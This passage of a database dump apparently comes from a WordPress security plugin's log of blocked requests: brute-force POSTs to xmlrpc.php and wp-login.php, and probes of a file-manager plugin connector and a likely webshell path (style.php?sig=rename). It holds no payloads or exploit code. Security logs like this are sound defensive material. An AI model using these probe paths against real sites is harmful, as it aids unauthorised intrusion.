Firefox\\/73.0\"}','b8pr7U4H39GRcLWE2APDzuJs',0,1681875226.7391,1722,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','wYgOHD2AVqfEykZBhpC0m8Qb',0,1681879311.2876,569,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','DCRVElt1Wy26Ykndi8wKfBxc',0,1681879292.4677,1340,'','POST',403,0,515,0,1,'',0),('185.253.215.16',3120420624,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','Ce53QywDogu06JViaHszZK2B',0,1681879300.0589,563,'','POST',403,0,515,0,1,'',0),('82.165.86.58',1386567226,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','OoQMeUivxESr3aqj5R19HzG8',0,1681879292.1871,1467,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','7zdoZRI8ykqEMwvp0HVUgjf9',0,1681879286.4950,584,'','POST',403,0,515,0,1,'',0),('217.76.49.125',3645649277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','yfYxBndkaO9vgH3WPirRU4Lb',0,1681879285.7220,592,'','POST',403,0,515,0,1,'',0),('45.150.149.86',764843350,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','QjmdP7bRTBU2JNzo8O3VfYXk',0,1681879268.3563,776,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','GOsH6lfk8v4wZMD9jdaxte3R',0,1681879264.8827,3689,'','POST',403,0,515,0,1,'',0),('62.102.148.154',1046910106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BRmrN23XIv78iTg1jSUYlAPJ',0,1681877901.2675,5494,'','POST',403,0,515,0,1,'',0),('122.201.124.60',2060024892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','mOhgZE9l6nASCqX0oYM8a1PV',0,1681883523.7075,677,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','hujpExs6Kr9UVDwlRmG5yJvW',0,1681883518.7400,689,'','POST',403,0,515,0,1,'',0),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','oeVBwkxLNRDdcQ3AHztXlvJF',0,1681883513.4979,565,'','POST',403,0,515,0,1,'',0),('198.38.91.22',3324402454,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','83QlwC5d1WSiLym9IsYJgMBf',0,1681883508.0643,3894,'','POST',403,0,515,0,1,'',0),('81.88.53.58',1364735290,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','k18VFqeEoCx7jWtScK9NTyMD',0,1681883508.0851,3873,'','POST',403,0,515,0,1,'',0),('209.58.183.78',3510286158,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NB8lLWJI3uH6dbkmq1X4Qwhs',0,1681882646.4123,4837,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','Tr4hW3QnytDpGLXHOPJZw58M',0,1681888706.8423,606,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','aImRXbn7E8GcjC4AeH0xzusJ',0,1681888701.5413,620,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','q0gCjk1rbDF6KzmsB49IfXU5',0,1681888700.1860,1263,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','7xE6wGFKPy3LefjrclhkHAY0',0,1681888699.8962,1245,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','RJu53QUn6ibX0IeFo9EyWgPL',0,1681888690.8543,592,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','35LsYc6K7UMQiFvE10qzjm2a',0,1681888682.0466,617,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','6xDK1lnNEdwp2SRqkU7abFyv',0,1681888676.1736,829,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','MYNzeahqw4G0SldAXsFjcKiU',0,1681888675.5946,962,'','POST',403,0,515,0,1,'',0),('161.35.227.188',2703483836,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','73uzxqyjlYW0k18rE4K295ai',0,1681895004.6623,791,'','POST',403,0,515,0,1,'',0),('61.221.35.29',1037902621,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','w7bsk21xAHgn4QXV0idqLcvu',0,1681894994.2629,704,'','POST',403,0,515,0,1,'',0),('61.221.35.29',1037902621,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Pk3jYrAfxTNm9qdHDQvRaSCX',0,1681894984.7605,657,'','POST',403,0,515,0,1,'',0),('198.54.126.2',3325459970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','RFPHK5t1CzWTxlYv6Vi9GwQy',0,1681894983.9069,777,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','bthC3VJmF2vpKEwR0QNUl8oW',0,1681894980.9324,644,'','POST',403,0,515,0,1,'',0),('51.161.94.36',866213412,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','9JrzKOdYTUvmpRb6gwcith7y',0,1681894979.0946,644,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','qAiZj5yEpG2FwWlea4tmLfX9',0,1681894972.6506,567,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','aA8nCqEfWMs6gtlG7OdNRVPU',0,1681894967.0836,1299,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','HKFXwLZfkYOBinTW13tazMoh',0,1681894964.4795,1930,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','GVdhJlcEt5MPTC7XBgKIYU3O',0,1681898907.2188,1769,'','POST',404,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','NzM0mHuVd1kG4jJhrXDBYEyt',0,1681902119.4599,633,'','POST',403,0,515,0,1,'',0),('81.21.253.29',1360395549,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','T6cMnXoaPkYIBtbKjZe84CqU',0,1681902113.2008,562,'','POST',403,0,515,0,1,'',0),('199.250.222.107',3355106923,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','YzKfoJv2CwncZGqH40isU1Pl',0,1681902111.1140,594,'','POST',403,0,515,0,1,'',0),('139.59.13.196',2335903172,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','MbmFSLoXDT0jQx3WCsGwk6Yr',0,1681902108.7517,1518,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','KUl6ia3DGvfmd1hN2qy7uxnS',0,1681902100.8884,583,'','POST',403,0,515,0,1,'',0),('139.180.144.234',2343866602,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','ZcWL5pogOxYjzwdtCXI4UNMS',0,1681902098.4992,630,'','POST',403,0,515,0,1,'',0),('81.21.253.29',1360395549,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','ZxBYrM2KUgaHW5iONIhA3FPp',0,1681902094.0579,1021,'','POST',403,0,515,0,1,'',0),('101.32.190.143',1696644751,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','jlYZpdzyRm7SWNf6u0Git9Vw',0,1681902093.5308,1170,'','POST',403,0,515,0,1,'',0),('195.158.22.187',3281917627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','psiBU2uytYxHkehMW5oOnPTb',0,1681909477.4780,1378,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','ilGfhL1qEWReZ0okUgAsKBup',0,1681909470.5191,675,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','fhF2i805wmIzUAGja47cpHdM',0,1681909460.6509,5629,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','iEkj2sHDtlgxLrmSvYon56uG',0,1681915380.1735,575,'','POST',403,0,515,0,1,'',0),('125.227.111.133',2112057221,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','AkUwMQixGK0NatpcTs5b4yLg',0,1681915391.3792,611,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','r7XVuLG6F3OfteDK9bg8w2Tv',0,1681915365.9354,573,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','HwCBj6pQOF3zlyNWngU9DE17',0,1681915357.6635,1379,'','POST',403,0,515,0,1,'',0),('194.187.251.155',3267099547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kc5bvywHB6ahFmsQMYPld97q',0,1681914982.7308,1572,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','rVFW4tszhuUD9Z6g1PH730MG',0,1681915356.4517,695,'','POST',403,0,515,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/wp-login.php?bypass_wpem=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','Jr4deHy1Y965MkwEuASbPBQU',0,1681919789.6634,390,'','GET',404,0,600,0,1,'',0),('213.152.162.74',3583550026,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nJjKo8Tx4MZ1hfWr2AePRpLi',0,1681919805.0089,621,'','POST',403,0,515,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\"}','BNjR3kUyh0JxHf7EA2Dw1Wbu',0,1681919787.6413,658,'','GET',404,0,600,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-login.php?bypass_wpem=1\"}','vTAPc6xiUm9lWfwqre5VMbQS',0,1681919685.6531,397,'','POST',403,0,600,0,1,'',0),('54.191.137.17',918522129,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?redirect_to=http%3A%2F%2Fcmdev-site1.com%2Fwp-admin%2F&reauth=1\"}','0PVCmYLIJT9EeOyR62A3kcsS',0,1681919683.1556,397,'','POST',403,0,600,0,1,'',0),('103.184.97.242',1740136946,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','tZJj7NX52hPbk1MuDF4yV3s9',0,1681919185.4908,592,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','qSKjnaYgmtklZPzdWui5CB6o',0,1681919179.7853,569,'','POST',403,0,515,0,1,'',0),('184.168.97.220',3098042844,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','1fuadXhoVcnzgSlvx6k8DT9m',0,1681919177.1038,580,'','POST',403,0,515,0,1,'',0),('185.110.66.2',3111010818,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Y3rgzUknXTWZR2DsBmNadbMi',0,1681919162.5400,612,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','CuSv5kKRYP4U19AoQOg3aLfW',0,1681919161.3940,587,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','dZFna3gSR04WG67eCKDc5UhQ',0,1681919158.5849,627,'','POST',403,0,515,0,1,'',0),('34.80.163.64',575710016,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','PBqiteNxopHl9AGgCyc1DsZR',0,1681919154.4151,537,'','POST',403,0,515,0,1,'',0),('161.97.187.66',2707536706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','hr6zOHuvbUdgaMkoAJIF7y3m',0,1681919144.9862,1792,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','1TZonFvm3zdO9b0XWhYqyEep',0,1681919147.8920,549,'','POST',403,0,515,0,1,'',0),('161.97.187.66',2707536706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','heX9nBlTAs5drEFkgaZ6cfyj',0,1681919144.6343,1456,'','POST',403,0,515,0,1,'',0),('45.61.184.240',759019760,'','https://www.cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','eHayLN6T4RkAtons7bxdr9vW',0,1681918183.2871,598,'','POST',403,0,600,0,1,'',0),('146.70.76.43',2454080555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0KI7iM2Ekd9U4TRzx5BoHFaw',0,1681917971.4679,4490,'','POST',403,0,515,0,1,'',0),('45.61.184.240',759019760,'','https://www.cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','DI2ZAgdwGvEQph4Pqt3N6ceW',0,1681918159.4434,555,'','POST',403,0,600,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','HSuskWCt3r5D0Yz78oEf2PBK',0,1681924385.5588,1199,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','EzZ4WlY5h7VBDfKqspi32SIx',0,1681924384.9899,1288,'','POST',403,0,515,0,1,'',0),('65.109.160.235',1097703659,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','aXr4GfsPynYkUOxi2DETMJht',0,1681924375.4497,3002,'','POST',403,0,515,0,1,'',0),('209.141.49.234',3515691498,'','https://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','P7RStn4JjB5VZdAfW0gphMHo',0,1681924188.9827,1428,'','POST',403,0,600,0,1,'',0),('137.63.71.51',2302625587,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eOoVf4Pd3ARJiCF1tzhjHuYN',0,1681924175.2480,972,'','POST',403,0,515,0,1,'',0),('206.189.22.204',3468498636,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','b9ulZVI4h0D6nsNeqimAywCL',0,1679333239.5568,1694,'','POST',403,0,515,0,1,'',0),('103.75.184.151',1733015703,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','EBZv94spQVgzIHwnlMUqX57t',0,1679333245.0969,543,'','POST',403,0,515,0,1,'',0),('103.75.184.151',1733015703,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','ELp8h5ziXgj1KqT0vRmZ6nHw',0,1679333253.8301,2226,'','POST',403,0,515,0,1,'',0),('207.148.65.134',3482599814,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','ldKpDquHXrxe0Ahiv5RYNzCn',0,1679333254.7555,1925,'','POST',403,0,515,0,1,'',0),('159.69.234.174',2672159406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','KtxeLQ1UMBkI8fFANGPdrCwY',0,1679333270.1025,558,'','POST',403,0,515,0,1,'',0),('151.80.88.201',2538625225,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','wIZUqS84VlE0NurbvtYhMR6F',0,1679333272.9283,583,'','POST',403,0,515,0,1,'',0),('185.233.185.80',3119102288,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','HCpsx8ScuKr1DW4bAt5O6Z0L',0,1679333285.3362,587,'','POST',403,0,515,0,1,'',0),('147.78.47.249',2471374841,'','http://mail.cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Safari\\/537.36\"}','jCEh6DY9wMIyq378Tuko4pU1',0,1679333337.5511,271,'','GET',403,0,700,0,1,'',0),('185.26.122.75',3105520203,'','http://cmdev-site1.com/wp-admin/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 